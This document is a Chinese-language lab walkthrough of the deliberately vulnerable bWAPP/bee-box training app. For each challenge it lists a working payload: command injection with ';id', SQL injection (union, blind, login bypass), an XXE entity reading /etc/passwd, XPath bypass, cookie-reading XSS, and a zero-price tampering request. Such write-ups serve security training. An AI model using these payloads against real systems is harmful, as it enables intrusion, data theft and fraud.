下载&安装

bwapp可以单独下载,然后部署到apache+php+mysql的环境,也可以下载他的虚拟机版本bee-box,但是有好多漏洞是bee-box里边有,但单独安装bwapp没有的,比如破壳漏洞,心脏滴血漏洞等。我这里主要用bee-box进行介绍。

下载地址

     【传送门

开始搞事情

0x00 HTML Injection - Reflected (GET)

【Low】

<a href="http://www.baidu.com">OnClick</a>

81811be1341f4bbd.png


【medium】

%3ca href=http://www.baidu.com%3eClick%3c/a%3e

f6a7f2cfe9aaf033.png

0x01 HTML Injection - Reflected (POST)

【Low】

<a href="http://www.baidu.com">OnClick</a>

f48fe97fc663f92b.png

【medium】

%3ca href=http://www.baidu.com%3eClick%3c/a%3e

976520239179fe17.png

0x02 iFrame Injection

?ParamUrl=http://www.baidu.com

c6f0884ee77c6f50.png

0x03 OS Command Injection

Exploit(Low)

www.nsa.gov;id

d4142ca1a4c5e060.png

Exploit(medium)

www.nsa.gov|id

bdd4ece89fb7e49c.png

0x04 PHP Code Injection

?message=phpinfo()

0f3aec02e77ced4e.png

0x05 SQL Injection (GET/Search)

Exploit(Low)

-1 %'+union+select+1,2,3,4,version(),6,7 --+

ef7ba00e5097d84f.png

0x06 SQL Injection (GET/Select)

Exploit(Low)

?movie=-1 union select 1,2,3,4,version(),6,7

88c44c4f64463d4e.png

0x07 SQL Injection (POST/Search)

title=Iron+Man%'UNION SELECT 1,2,3,4,version(),6,7  #

d5cadcd571175ecb.png

0x08 SQL Injection (POST/Select)

movie=-1 UNION SELECT 1,2,3,4,version(),6,7

4fe6a44a1e90b2f1.png

0x09 SQL Injection (AJAX/JSON/jQuery)

http://192.168.0.32/bWAPP/sqli_10-2.php?title=I%%27+UNION+SELECT+1,2,3,4,version(),6,7+--+

fe55a43c92c4d339.png

0x10 SQL Injection (CAPTCHA)

?title=Iron+Man%' UNION SELECT 1,2,3,4,version(),6,7 --+

142611fec3ffe573.png

0x11 SQL Injection (Login Form/Hero)

superhero' or 1=1#

8794fac0766e711d.png

0x12 SQL Injection (Login Form/User)

login=' and 0 UNION SELECT 1,2,'356a192b7913b04c54574d18c28d46e6395428ab',4,5,6,7,8,9#
&password=1
&form=submit

a063bca699ce317a.png

0x13 SQL Injection - Stored (Blog)

',(select version()))#

5da744acedccd0c0.png

0x14 SQL Injection - Stored (User-Agent)

User-AgentL: 123',(select version()))#

532e62e71d2c8cf7.png

0x15 SQL Injection - Stored (XML)

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///etc//passwd">]>
<rest>
  <login>&test;</login>
  <secret>login</secret>
</rest>

84fbc34790a8abf5.png

0x16 SQL Injection - Blind - Boolean-Based

?title=Iron Man ' and (substr((select version()),1,1)=5) --+

271a7b1b307d5e21.png

0x17 SQL Injection - Blind - Time-Based

?title=Iron Man' and (if((substr((select version()),1,1)=5),sleep(5),null)) --+

d8a3fa741fe82a69.png

0x18 SQL Injection - Blind (WS/SOAP) 

?title=Iron Man ' and (substr((select version()),1,1)=5) --+

e5dc3757fdf7dbb9.png

0x19 XML/XPath Injection (Login Form)

http://192.168.0.32/bWAPP/xmli_1.php
?login=' or '1'='1
&password=' or '1'='1
&form=submit

531ae759e64e1380.png

0x20 Broken Auth. - CAPTCHA Bypassing

a3e99e0748fe56b4.png

0x21 Broken Auth. - Forgotten Function

d694fc797a98a635.png

0x22 Broken Auth. - Insecure Login Forms

e16b98974ff8c6e3.png

0x23 Broken Auth. - Password Attacks

d15ce41c9d098e75.png

0x24 Broken Auth. - Weak Passwords

985643b7ec28b35c.png

0x25 Session Mgmt. - Administrative Portals

16dbf863f2615936.png

0x26 XSS - Reflected (GET)

<script>alert(document.cookie)</script>

0x27 XSS - Reflected (POST)

<script>alert(document.cookie)</script>

0x28 XSS - Reflected (JSON)

<img src=1 onerror=alert(1) />

0x29 XSS - Reflected (AJAX/JSON)

<img src=1 onerror=alert(1) />

0x30 XSS - Reflected (Back Button)

Referer: '" onmousemove="alert(1)"
修改请求包referer字段

0x31 XSS - Reflected (Custom Header)

bWAPP: <script>alert(1)</script>
增加请求包字段

947574c200c092fa.png

0x32 XSS - Reflected (Eval)

?date=alert(document.cookie)

cbe6a98c603fa4db.png

0x33 XSS - Reflected (HREF)

><script>alert(1)</script>

29773de15e3e1f44.png

0x34 XSS - Reflected (Login Form)

login=' or 1=1 
&password=<script>alert(1)</script>
&form=submit

a719559b8d0fddf6.png

0x35 XSS - Reflected (PHP_SELF)

<script>alert(document.cookie)</script>

0x36 XSS - Reflected (Referer)

<script>alert(document.cookie)</script>

f51be57481289268.png

0x37 XSS - Reflected (User-Agent)

<script>alert(document.cookie)</script>

c56f59805c4e8765.png

0x38 XSS - Stored (Blog)

<script>alert(document.cookie)</script>

0x39 XSS - Stored (User-Agent)

User-Agent: <script>alert(document.cookie)</script>

01903efda621fe5f.png

0x40 Insecure DOR (Order Tickets)

(Low)
ticket_quantity=15&ticket_price=0&action=order
修改 数据包 ticket_price 的值

a6249c59725c7794.png

(medium)
ticket_quantity=15&ticket_price=0&action=order
在 请求包中增加ticket_price 参数 并赋值。

ff39e40b33bcb7b1.png